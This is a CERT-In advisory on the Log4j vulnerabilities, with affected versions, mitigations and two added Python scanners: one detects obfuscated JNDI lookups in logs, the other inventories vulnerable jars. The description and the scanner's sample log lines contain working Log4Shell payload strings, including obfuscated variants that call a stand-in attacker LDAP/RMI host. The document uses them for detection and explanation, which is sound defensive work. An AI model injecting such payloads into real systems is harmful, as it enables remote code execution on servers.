CERT-In Advisory
CIAD-2021-0046
Multiple Vulnerabilities in Apache Log4j
Original Issue Date: December 10, 2021
Updated: December 30, 2021
Severity Rating: Critical
Systems Affected
Various implementations of:
- Apache Log4j 1.2
- Apache Log4j versions 2.0-alpha1 through 2.17.0
Overview
Multiple vulnerabilities have been reported in the Apache Log4j Java logging library which could allow a remote attacker to gain full control of the targeted servers or cause a denial of service (DoS) condition.
Description
1. Remote Code Execution Vulnerability [Log4Shell] (CVE-2021-44228)
This vulnerability exists in Apache Log4j versions 2.0-beta9 to 2.14.1 (excluding the security releases 2.3.1, 2.12.2 and 2.12.3) because the JNDI features used in configuration, log messages and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. A remote attacker who can get a crafted string such as ${jndi:ldap://attacker-host/a} into any value that is logged can make the server load and execute code from the attacker's LDAP server when message lookup substitution is enabled.
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code and take full control of the targeted server.
Note: This vulnerability is being actively exploited in the wild.
2. Remote Code Execution Vulnerability (CVE-2021-45046)
This vulnerability exists in Apache Log4j versions 2.0-beta9 to 2.15.0 (excluding 2.12.2) because the fix for CVE-2021-44228 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example $${ctx:loginId}) or a Thread Context Map (MDC) pattern, a remote unauthenticated attacker who controls the Thread Context Map input data could inject a crafted JNDI Lookup pattern, resulting in an information leak, remote code execution in some environments and local code execution in all environments.
Note: only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
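The lookup syntax behind CVE-2021-44228 and CVE-2021-45046 lets an attacker hide the ${jndi: prefix behind nested lookups (${lower:j}, ${::-j}, ${env:NOPE:-j}) and behind URL encoding, so a literal search for "${jndi:" in web server or application logs misses much of what is seen in the wild. The Python below is an added example written for this advisory, not code from CERT-In or from the Log4j project: it collapses those nested lookups from the inside out the way Log4j's Interpolator evaluates the resolvers attackers abuse for obfuscation, then flags any line that still carries a jndi lookup, or any other lookup syntax, in client-supplied fields. The access-log lines are constructed for the example and the resolver names it understands (lower, upper, the empty lookup and the ":-" default) are the subset relevant to obfuscation, not the full Log4j lookup set.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines for the example (not real traffic); 203.0.113.0/24 is TEST-NET-3.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:13:01:05 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.9/x}"',
    '10.0.0.7 - - [10/Dec/2021:13:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9/y}"',
    '10.0.0.8 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}dns://203.0.113.9/z}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:10 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fq%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.10 - - [10/Dec/2021:13:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.11 - - [10/Dec/2021:13:01:12 +0000] "GET /?user=${ctx:loginId} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# An innermost ${...}: no nested "${" and no "}" between the braces.
_INNER = re.compile(r'\$\{([^${}]*)\}')
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)
_ANY_LOOKUP = re.compile(r'\$\{[^}]*\}')


def _resolve(body):
    """Evaluate one innermost lookup body the way Log4j's Interpolator treats the resolvers
    used for obfuscation. Returns None when the text must stay verbatim (jndi itself, or a
    lookup such as ${ctx:...} that cannot be evaluated offline and carries no ':-' default)."""
    head, has_default, default = body.partition(':-')
    name, _, key = head.partition(':')
    name = name.strip().lower()
    if name == 'jndi':
        return None
    if name == 'lower':
        return key.lower()
    if name == 'upper':
        return key.upper()
    # ${::-j}, ${env:NOPE:-j}, ${sys:NOPE:-j}, ${date:NOPE:-j} ...: the default text is substituted.
    return default if has_default else None


def normalize(text, max_rounds=64):
    """URL-decode, then collapse nested lookups from the inside out until nothing changes.
    max_rounds bounds the work so a self-referential payload cannot make the scanner spin."""
    text = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = _INNER.sub(substitute, text)
        if not changed:
            break
    return text


def classify(line):
    norm = normalize(line)
    if _JNDI.search(norm):
        return 'jndi-lookup'      # CVE-2021-44228 / CVE-2021-45046 style payload
    if _ANY_LOOKUP.search(norm):
        return 'other-lookup'     # ${ctx:...} etc. in client-supplied data is never legitimate
    return 'clean'


def scan(lines):
    """Return (verdict, normalized line) for each input line."""
    return [(classify(line), normalize(line)) for line in lines]


if __name__ == '__main__':
    for verdict, norm in scan(SAMPLE_LINES):
        if verdict != 'clean':
            print(f'{verdict:13} {norm}')
```

Run it over real access, proxy or application logs one line at a time; the normalized form in the output is what Log4j would have evaluated, which is also the string to use when extracting the attacker's callback host for blocking. Lines flagged other-lookup deserve attention because the Context Lookup and MDC patterns named under CVE-2021-45046 and CVE-2021-45105 are exactly the place where such strings become dangerous.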
3. Denial of Service Vulnerability (CVE-2021-45105)
This vulnerability exists in Apache Log4j versions 2.0-beta9 to 2.16.0 (excluding 2.12.3) because the library does not protect against uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example $${ctx:loginId}), a remote unauthenticated attacker who controls the Thread Context Map data could inject a crafted payload containing a recursive lookup, causing a StackOverflowError that terminates the process and results in a denial of service (DoS) condition.
Note: Only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
4. Remote Code Execution Vulnerability (CVE-2021-44832)
This vulnerability exists in Apache Log4j versions 2.0-alpha7 to 2.17.0 (excluding 2.3.2 and 2.12.4) because a JDBC Appender can be configured with a data source that references a JNDI URI, and the library does not restrict where that URI may point. An attacker with permission to modify the logging configuration file could construct such a malicious configuration and execute arbitrary code on the targeted system. Unlike CVE-2021-44228, this issue requires write access to the logging configuration and is not triggered by logged data alone.
Note: Only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
5. Remote Code Execution Vulnerability (CVE-2021-4104)
This vulnerability is due to deserialization of untrusted data by JMSAppender in Apache Log4j version 1.x. A remote attacker could execute code on the server if the deployed application is configured to use JMSAppender and the attacker can point it at a JMS broker under the attacker's control, for example by supplying the TopicBindingName and TopicConnectionFactoryBindingName settings, which causes JMSAppender to perform JNDI requests in a similar fashion to CVE-2021-44228.
Note: This vulnerability only affects applications which are specifically configured to use JMSAppender, which is not enabled by default, or where the attacker has write access to the Log4j configuration. Apache Log4j 1.2 reached end of life in August 2015 and will not receive a fix.
Solution
Upgrade to a release that fixes all of the Log4j 2 issues above: Log4j 2.17.1 (Java 8 and later), 2.12.4 (Java 7) or 2.3.2 (Java 6), as listed on the Apache security page below. Where an immediate upgrade is not possible, remove the JndiLookup class from the classpath (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class); this mitigates CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 but not CVE-2021-44832, which requires the upgrade. Setting log4j2.formatMsgNoLookups=true or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable is not a sufficient mitigation for CVE-2021-45046. For Log4j 1.x, which is end of life, migrate to a supported Log4j 2 release or, failing that, ensure no configuration uses JMSAppender and that the configuration file is not writable by untrusted users. In all cases, apply the patches and mitigation steps published by the vendors listed below, since Log4j is frequently bundled inside vendor products and nested archives.
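Because Log4j ships bundled inside application archives and vendor products, the first step of any remediation is an inventory of which log4j-core and Log4j 1.x jars are actually on disk, at what version, and whether a JndiLookup removal has already been applied. The Python below is an added example written for this advisory, not code from CERT-In or from the Apache project: it walks a directory tree, opens every .jar/.war/.ear/.zip (recursing into archives nested inside archives), identifies Log4j artefacts by class entries that exist in the real Apache jars, reads the version from the Maven pom.properties the jars carry (falling back to the file name), and classifies each hit against the fixed releases named on the Apache security page. The sample tree it builds for the demonstration contains constructed stand-in jars that hold only the marker entries, not real Log4j code.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Entry names inside the real Apache artefacts that the scanner keys on.
CORE_MARKER = 'org/apache/logging/log4j/core/LoggerContext.class'
JNDI_LOOKUP = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'
CORE_POM = 'META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties'
LOG4J1_MARKER = 'org/apache/log4j/Logger.class'
BRIDGE_POM = 'META-INF/maven/org.apache.logging.log4j/log4j-1.2-api/pom.properties'
JMS_APPENDER = 'org/apache/log4j/net/JMSAppender.class'
ARCHIVES = ('.jar', '.war', '.ear', '.zip')


def parse_version(text):
    """'2.17.1' -> (2,17,1,1,0); '2.0-beta9' -> (2,0,0,0,9), so pre-releases sort below finals."""
    m = re.fullmatch(r'(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?', text.strip(), re.I)
    if not m:
        return None
    core = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    return core + ((0, int(m.group(5) or 0)) if m.group(4) else (1, 0))


def log4j2_fixed(version):
    """True if the release fixes all four 2.x CVEs in this advisory (2.17.1, 2.12.4 or 2.3.2)."""
    v = parse_version(version)
    if v is None:
        return False
    if v[:2] == (2, 3):
        return v >= (2, 3, 2, 1, 0)      # Java 6 branch
    if v[:2] == (2, 12):
        return v >= (2, 12, 4, 1, 0)     # Java 7 branch
    return v >= (2, 17, 1, 1, 0)


def _core_version(zf, names, display):
    if CORE_POM in names:
        for line in zf.read(CORE_POM).decode('utf-8', 'replace').splitlines():
            if line.startswith('version='):
                return line.split('=', 1)[1].strip()
    m = re.search(r'log4j-core-(\d[\w.\-]*?)\.jar$', display)   # fall back to the file name
    return m.group(1) if m else 'unknown'


def inspect_zip(zf, display, findings):
    names = set(zf.namelist())
    if CORE_MARKER in names:
        version = _core_version(zf, names, display)
        if log4j2_fixed(version):
            status = 'fixed'
        elif JNDI_LOOKUP not in names:
            # JndiLookup removed: covers CVE-2021-44228/45046/45105 but not CVE-2021-44832.
            status = 'partially-mitigated'
        else:
            status = 'vulnerable'        # unknown versions are deliberately treated as vulnerable
        findings.append({'path': display, 'version': version, 'status': status})
    elif LOG4J1_MARKER in names and BRIDGE_POM not in names:
        # Log4j 1.x; the log4j-1.2-api bridge jar also ships org/apache/log4j classes and is excluded.
        status = 'log4j1-jmsappender-present' if JMS_APPENDER in names else 'log4j1-eol'
        findings.append({'path': display, 'version': '1.x', 'status': status})
    for member in sorted(names):         # recurse into bundled jars (WEB-INF/lib, ear modules)
        if member.lower().endswith(ARCHIVES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(member))) as inner:
                    inspect_zip(inner, f'{display}!{member}', findings)
            except zipfile.BadZipFile:
                pass


def scan_tree(root):
    """Walk a directory and report every Log4j artefact found, including nested ones."""
    findings = []
    for path in sorted(Path(root).rglob('*')):
        if path.is_file() and path.suffix.lower() in ARCHIVES:
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_zip(zf, str(path), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _write_zip(path, members):
    with zipfile.ZipFile(path, 'w') as zf:
        for name, data in members.items():
            zf.writestr(name, data)


def build_sample_tree(root):
    """Constructed stand-ins for real jars: only the marker entries matter to the scanner."""
    lib = Path(root) / 'app' / 'lib'
    lib.mkdir(parents=True)
    core = {CORE_MARKER: b'', JNDI_LOOKUP: b''}
    _write_zip(lib / 'log4j-core-2.14.1.jar', {**core, CORE_POM: b'version=2.14.1\n'})
    _write_zip(lib / 'log4j-core-2.17.1.jar', {**core, CORE_POM: b'version=2.17.1\n'})
    _write_zip(lib / 'log4j-1.2.17.jar', {LOG4J1_MARKER: b'', JMS_APPENDER: b''})
    inner = io.BytesIO()                 # 2.16.0 with JndiLookup.class deleted, bundled in a .war
    _write_zip(inner, {CORE_MARKER: b'', CORE_POM: b'version=2.16.0\n'})
    _write_zip(lib.parent / 'legacy.war', {'WEB-INF/lib/log4j-core-2.16.0.jar': inner.getvalue()})
    return root


def run_demo():
    return scan_tree(build_sample_tree(tempfile.mkdtemp()))


if __name__ == '__main__':
    for f in run_demo():
        print(f"{f['status']:28} {f['version']:8} {f['path']}")
```

Point scan_tree at an application or product install directory; the partially-mitigated status is the case to watch, since a 2.x jar with JndiLookup stripped is still exposed to CVE-2021-44832 if an attacker can write the logging configuration, and a log4j1-jmsappender-present hit needs a check of the configuration files for JMSAppender.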
Vendor Information
https://logging.apache.org/log4j/2.x/security.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
https://security.paloaltonetworks.com/CVE-2021-44228
https://www.fortiguard.com/psirt/FG-IR-21-245
https://www.oracle.com/java/technologies/javase/products-doc-8u121-revision-builds-relnotes.html
https://access.redhat.com/security/vulnerabilities/RHSB-2021-009
https://ubuntu.com/blog/log4j-vulnerability-2021
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-44228
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04215en_us
https://kb.vmware.com/s/article/87092
https://aws.amazon.com/security/security-bulletins/AWS-2021-006/
https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/
https://knowledge.broadcom.com/external/article?articleId=230308
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
https://www.ibm.com/support/pages/security-bulletin-vulnerability-apache-log4j-affects-websphere-application-server-cve-2021-44228
https://www.sophos.com/en-us/security-advisories/sophos-sa-20211210-log4j-rce
https://www.mongodb.com/blog/post/log4shell-vulnerability-cve-2021-44228-and-mongodb
https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US
https://www.esri.com/arcgis-blog/products/arcgis-enterprise/administration/arcgis-software-and-cve-2021-44228-aka-log4shell-aka-logjam/
https://support.avaya.com/helpcenter/getGenericDetails?detailId=1399839287609
https://www.dell.com/support/kbdoc/en-in/000194414/dell-response-to-apache-log4j-remote-code-execution-vulnerability
https://www.elastic.co/blog/new-elasticsearch-and-logstash-releases-upgrade-apache-log4j2
https://nvidia.custhelp.com/app/answers/detail/a_id/5294
https://www.johnsoncontrols.com/-/media/jci/cyber-solutions/product-security-advisories/2021/jci-psa-2021-24.pdf
https://security.netapp.com/advisory/ntap-20211223-0007/
https://search.abb.com/library/Download.aspx?DocumentID=8DBD003132&LanguageCode=en&DocumentPartId=&Action=Launch
https://www.tp-link.com/us/support/faq/3255/
https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SESB-2021-347-01_Apache_Log4j_Log4Shell_Vulnerabilities_Security_Notification_V8.1+.pdf
https://struts.apache.org/announce-2022
https://struts.apache.org/announce-2021.html
https://www.ibm.com/support/pages/node/6538138
https://www.ibm.com/support/pages/node/6538148
References
https://logging.apache.org/log4j/2.x/security.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://github.com/tangxiaofeng7/apache-log4j-poc
https://www.randori.com/blog/cve-2021-44228/
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://blogs.oracle.com/security/post/log4j-vulnerabilities
https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
https://aws.amazon.com/blogs/publicsector/aws-resources-to-address-apache-log4j-vulnerabilities/
CVE Name
CVE-2021-44228
CVE-2021-45046
CVE-2021-4104
CVE-2021-45105
CVE-2021-44832
Disclaimer
The information provided herein is on "as is" basis, without warranty of any kind.
Contact Information
Email: info@cert-in.org.in Phone: +91-11-24368572
Postal address
Indian Computer Emergency Response Team (CERT-In) Ministry of Electronics and Information Technology Government of India Electronics Niketan 6, CGO Complex, Lodhi Road, New Delhi - 110 003 India